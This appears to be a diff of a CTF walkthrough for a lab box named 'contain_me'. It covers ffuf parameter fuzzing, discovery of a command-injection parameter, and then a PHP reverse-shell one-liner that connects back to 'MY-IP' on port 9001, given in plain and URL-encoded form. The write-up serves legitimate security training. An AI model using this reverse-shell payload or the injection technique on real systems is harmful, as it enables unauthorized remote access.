Dood3/walkthrough-s-/contain_me.md

 <code>ffuf -u http://10.10.163.146/index.php?FUZZ=a -w /usr/share/wordlists/dirb/common.txt -fs 329</code>

-The outcome was:\
+The outcome was:
 <code>path                    [Status: 200, Size: 79, Words: 9, Lines: 11]</code>

 So we found the path.
-As we could view the directory listing earlier and this is a box marked as easy, I tried simple rce like id, whoami and so on.
+As we could view the directory listing earlier, I tried simple rce like id, whoami and so on.
 Nothing seemed to work.
 The only thing that gave something back, was `ls` and `pwd` (with backticks).
-So just the directory listing is enabled, it seems.\
+So just the directory listing is enabled, it seems.
 So why not try "/"?
-Bingo..\
+Bingo..
-I'm able to see the directory listing of "/".\
+I'm able to see the directory listing of "/".
-With this opportunity given, I wanted to take a look in the home directory.\
+With this opportunity given, I wanted to take a look in the home directory.
 So I found mike.

 ![PIC_MIKE](https://user-images.githubusercontent.com/93183445/141819141-6e26bff1-fa75-4ce1-9dd8-cb29e4da2a47.png)

 But mike wasn't of great use, since I couldn't read or list the content of ".ssh/".

-Still reminding me that this is a box marked as "easy", I tried command injection.
+I tried command injection.
 With success:

 ![PIC_WHOAMI](https://user-images.githubusercontent.com/93183445/141819181-05119d8a-1653-4fed-bb16-85babe95f8df.png)

-It took me a few tries just to end up using php and url-encoding after I wasn't able to netcat or wget anything.\
+It took me a few tries just to end up using php and url-encoding after I wasn't able to netcat or wget anything.
-(Should have noticed earlier, because there's a lot of php going on..)\
+(Should have noticed earlier, because there's a lot of php going on..)
 Again, https://www.revshells.com to the rescue :)

-<code>php -r '$sock=fsockopen("MY-IP",9001);exec("sh <&3 >&3 2>&3");'</code>\
+<code>php -r '$sock=fsockopen("MY-IP",9001);exec("sh <&3 >&3 2>&3");'</code>
 Urlencoded we get:\
 <code>php%20-r%20%27%24sock%3Dfsockopen%28%22MY-IP%22%2C9001%29%3Bexec%28%22sh%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27</code>